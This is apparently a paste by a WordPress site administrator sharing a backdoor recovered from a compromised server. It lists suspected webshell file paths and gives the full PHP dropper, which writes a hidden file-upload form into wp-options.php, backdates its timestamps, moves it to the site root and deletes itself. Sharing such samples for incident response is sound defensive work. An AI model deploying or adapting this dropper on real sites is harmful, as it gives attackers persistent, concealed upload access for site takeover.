SHOW:
|
|
- or go back to the newest paste.
| 1 | /* Found suspicious backdoor that modifies wp-options.php in wp-admin directory, moves it to WordPress root, then removes itself. Placed by an unknown backdoor and sits silently for a request directly to frommhead.php. | |
| 2 | ||
| 3 | Possible backdoors may be cmdshell files, maldet found these files in production: | |
| 4 | wp-includes/js/thickbox/rvbt28.php | |
| 5 | wp-includes/class-wp-xmlrpc.php | |
| 6 | wp-content/themes/agentpress/mtgh.php | |
| 7 | ||
| 8 | Backdoors may have been placed by one or more vulnerabilities. A couple to note that were found in production but not 100% certain which exploit was used: | |
| 9 | http://blog.sucuri.net/2014/12/security-advisory-high-severity-wordpress-download-manager.html | |
| 10 | http://blog.sucuri.net/2014/12/revslider-vulnerability-leads-to-massive-wordpress-soaksoak-compromise.html | |
| 11 | ||
| 12 | One backdoor has placed eval(base64_decode) in the footer.php of all directories /themes/ and leaves a comment stating it's wp cache code. May be unrelated to frommshead.php but could have used one of the backdoors listed above. | |
| 13 | ||
| 14 | Still seeking possible backdoors that have evaded maldet. | |
| 15 | */ | |
| 16 | ||
| 17 | <?php | |
| 18 | ||
| 19 | $DEBUG_MODE=false; | |
| 20 | ||
| 21 | // Creating wp-admin/wp-options.php (uploader) | |
| 22 | ||
| 23 | $file_data_head ="<?php | |
| 24 | if(isset(#_POST['Submit'])){
| |
| 25 | #filedir = ''; | |
| 26 | #maxfile = '2888888'; | |
| 27 | ||
| 28 | #userfile_name = #_FILES['image']['name']; | |
| 29 | #userfile_tmp = #_FILES['image']['tmp_name']; | |
| 30 | if (isset(#_FILES['image']['name'])) {
| |
| 31 | #abod = #filedir.#userfile_name; | |
| 32 | @move_uploaded_file(#userfile_tmp, #abod); | |
| 33 | ||
| 34 | } | |
| 35 | } | |
| 36 | else{
| |
| 37 | echo'<form method=\"POST\" action=\"\" enctype=\"multipart/form-data\"><input type=\"file\" name=\"image\"><input type=\"Submit\" name=\"Submit\" value=\"Submit\"></form>'; | |
| 38 | } | |
| 39 | ?>"; | |
| 40 | ||
| 41 | echo"<br>---------------------------- Create wp-admin/wp-options.php (uploader) ---------------------------------<br><br>"; | |
| 42 | if (file_put_contents("wp-optionstmp.php", str_replace("#", "$", $file_data_head))) {
| |
| 43 | touch("wp-optionstmp.php", mktime(12, 17, 11, 12, 31, 2013));
| |
| 44 | echo"Proceeded: ".$start."/wp-admin/wp-options.php > Succesfull<br>"; | |
| 45 | } else {
| |
| 46 | echo"Proceeded: ".$start."/wp-admin/wp-options.php > Error!<br>"; | |
| 47 | } | |
| 48 | ||
| 49 | $file = 'wp-optionstmp.php'; | |
| 50 | $newfile = '../wp-options.php'; | |
| 51 | ||
| 52 | echo"<br>---------------------------- Move wp-admin/wp-options.php > To root folder ---------------------------------<br><br>"; | |
| 53 | if (rename($file,$newfile)) {
| |
| 54 | touch("../wp-options.php", mktime(12, 17, 11, 12, 31, 2013));
| |
| 55 | echo"Proceeded: ".$start."/wp-options.php > Succesfull<br>"; | |
| 56 | } else {
| |
| 57 | echo"Proceeded: ".$start."/wp-options.php > Error!<br>"; | |
| 58 | } | |
| 59 | ||
| 60 | $file='frommshead.php'; | |
| 61 | ||
| 62 | echo"<br>---------------------------- Remove frommshead.php (Remove files) ---------------------------------<br><br>"; | |
| 63 | touch("frommshead.php", mktime(12, 17, 11, 12, 31, 2013));
| |
| 64 | unlink($file); |
